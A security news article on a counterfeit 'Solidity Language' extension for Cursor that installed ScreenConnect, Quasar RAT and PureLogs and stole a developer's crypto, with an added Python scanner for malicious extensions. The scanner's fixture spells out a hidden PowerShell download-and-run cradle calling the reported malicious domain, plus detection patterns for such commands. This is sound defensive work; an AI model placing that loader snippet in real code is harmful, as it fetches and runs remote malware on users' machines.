Crypto Dev Loses $500K to Fake Cursor AI Extension: A New Supply Chain Threat
A counterfeit extension for the Cursor AI development environment, masquerading as a legitimate Ethereum utility, has resulted in a major cybersecurity incident—a Russian cryptocurrency developer lost half a million dollars due to the extension’s malicious behavior. Disguised under the name “Solidity Language,” the extension was hosted on the Open VSX registry and designed solely to enable remote access and exfiltrate sensitive data, including cryptocurrency wallets.
Cursor AI IDE, built atop Visual Studio Code, supports extensions via the alternative Open VSX marketplace. This flexibility became an attack surface: threat actors uploaded a fraudulent extension that mimicked a popular syntax-highlighting tool for Solidity. In reality, the package contained a JavaScript file named extension.js that launched a remote PowerShell script fetched from the domain angelic[.]su.
The PowerShell script checked for the presence of ScreenConnect (ConnectWise's legitimate remote-support tool) and, if it was not installed, added it to the system. Through ScreenConnect, the attackers gained full control over the victim's machine, enabling them to deploy additional malicious scripts. The final payload in the chain was a loader called VMDetector, retrieved from archive[.]org, which installed two strains of malware: Quasar RAT and PureLogs.
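The two stages above share one static signature: an extension.js that imports child_process, invokes PowerShell, and references a remote host, none of which a syntax-highlighting extension needs. The following triage script is an added example, not Kaspersky's tooling or Cursor's code, for reviewing locally installed extensions before trusting them. It assumes the usual layout of one directory per extension with a package.json at its root (as under ~/.cursor/extensions or ~/.vscode/extensions); the indicator host angelic.su is the defanged domain from the report, while the two sample extensions, their publisher names and the script path in the fixture are constructed here for the demonstration and never executed.

```python
"""Static triage of VS Code / Cursor extension directories for the loader
pattern described in the article: extension.js spawning PowerShell that pulls a
script from a remote host. Added example with constructed fixtures."""
import json
import re
import tempfile
from pathlib import Path

# Host named in the report as serving the first-stage PowerShell script
# (written there as angelic[.]su). Extend from your own IOC feed.
KNOWN_BAD_HOSTS = {"angelic.su"}

# Behavioural indicators, matched against every .js file the extension ships.
INDICATORS = [
    ("imports_child_process",
     re.compile(r"""(require\(\s*['"](node:)?child_process['"]\s*\)|from\s+['"](node:)?child_process['"])""")),
    ("invokes_powershell", re.compile(r"\b(powershell(\.exe)?|pwsh)\b", re.I)),
    ("ps_download_cradle",
     re.compile(r"(Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|"
                r"Invoke-Expression|\biwr\b|\birm\b|\biex\b|-EncodedCommand|-enc\b)", re.I)),
    ("remote_url", re.compile(r"https?://[\w.-]+", re.I)),
]
URL_HOST = re.compile(r"https?://([\w.-]+)", re.I)


def scan_source(text):
    """Return (indicator names hit, known-bad hosts referenced) for one JS file."""
    hits = {name for name, rx in INDICATORS if rx.search(text)}
    hosts = {h.lower() for h in URL_HOST.findall(text)}
    return hits, hosts & KNOWN_BAD_HOSTS


def verdict(hits, bad_hosts):
    """Known-bad host, or the full spawn + PowerShell + remote-URL chain, is malicious."""
    if bad_hosts:
        return "malicious"
    if {"imports_child_process", "invokes_powershell", "remote_url"} <= hits:
        return "malicious"
    if "imports_child_process" in hits or "ps_download_cradle" in hits:
        return "suspicious"
    return "clean"


def scan_extensions_root(root):
    """Walk <root>/<extension-dir>/ and return {publisher.name: (verdict, hits, bad_hosts)}."""
    report = {}
    for ext_dir in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        manifest = ext_dir / "package.json"
        if not manifest.is_file():
            continue
        meta = json.loads(manifest.read_text(encoding="utf-8"))
        ext_id = f"{meta.get('publisher', '?')}.{meta.get('name', ext_dir.name)}"
        all_hits, all_bad = set(), set()
        # Scan every shipped .js, not only the declared "main" entry point.
        for js in ext_dir.rglob("*.js"):
            h, b = scan_source(js.read_text(encoding="utf-8", errors="replace"))
            all_hits |= h
            all_bad |= b
        report[ext_id] = (verdict(all_hits, all_bad), all_hits, all_bad)
    return report


# Constructed fixtures: a benign highlighter and a stand-in for the described
# loader. Publisher names and the script path are invented; nothing here runs.
BENIGN_JS = """const vscode = require('vscode');
function activate(context) {
  // Grammar is contributed via package.json; nothing to spawn here.
  context.subscriptions.push(vscode.languages.registerHoverProvider('solidity', {
    provideHover() { return new vscode.Hover('Solidity keyword'); }
  }));
}
module.exports = { activate };
"""
LOADER_JS = """const { spawn } = require('child_process');
function activate() {
  const cmd = "iex (New-Object Net.WebClient).DownloadString('https://angelic.su/stage.ps1')";
  spawn('powershell.exe', ['-NoProfile', '-WindowStyle', 'Hidden', '-Command', cmd],
        { detached: true, windowsHide: true });
}
module.exports = { activate };
"""


def write_samples(root):
    """Lay out the two constructed extensions under root in the usual directory shape."""
    for dirname, meta, js in (
        ("good.solidity-highlighter-1.0.0", {"name": "solidity-highlighter", "publisher": "good"}, BENIGN_JS),
        ("evil.solidity-language-1.0.0", {"name": "solidity-language", "publisher": "evil"}, LOADER_JS),
    ):
        d = Path(root) / dirname
        d.mkdir(parents=True, exist_ok=True)
        (d / "package.json").write_text(json.dumps({**meta, "main": "./extension.js"}), encoding="utf-8")
        (d / "extension.js").write_text(js, encoding="utf-8")


def demo():
    """Build the fixtures in a temp dir and scan them; returns the report."""
    root = Path(tempfile.mkdtemp(prefix="ext-scan-"))
    write_samples(root)
    return scan_extensions_root(root)


if __name__ == "__main__":
    for ext_id, (v, hits, bad) in demo().items():
        print(f"{ext_id}: {v} hits={sorted(hits)} bad_hosts={sorted(bad)}")
```

Point scan_extensions_root at a real extensions directory to triage what is installed. The verdict deliberately requires the whole chain (child_process import, PowerShell, remote URL) before calling something malicious, because a lone URL in a license comment or a legitimate build helper that shells out is common; those land in "suspicious" for manual review, which is the code review the report recommends.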
Quasar RAT enabled remote command execution, while PureLogs specialized in data theft, targeting everything from saved passwords and session cookies to the contents of cryptocurrency wallets. According to Kaspersky Lab, these tools were directly responsible for the breach of the victim’s system.
Before its removal on July 2, the malicious extension had been downloaded approximately 54,000 times. However, security experts believe this number was artificially inflated to simulate popularity and build trust. The very next day, a nearly identical variant named “solidity” emerged and rapidly accumulated close to two million downloads. This surge in fake popularity allowed the fraudulent extension to surpass the legitimate one in Open VSX search results, thereby endangering tens of thousands of users.
Similar activity was observed on Visual Studio Code’s official marketplace, where malicious extensions with names like “solaibot,” “among-eth,” and “blankebesxstnion” were discovered. These followed the same attack pattern: install ScreenConnect, execute malicious scripts, and deploy info-stealing malware.
Experts warn that cybercriminals are skillfully exploiting trust in open-source software and ranking algorithms on distribution platforms. Developers often rely on public repositories, unaware that they may be seeded with threats. Kaspersky Lab emphasizes the importance of code review before installation—especially when an extension behaves suspiciously. Transparency and access to source code are strengths of the open-source model, but they also become liabilities when user vigilance falters.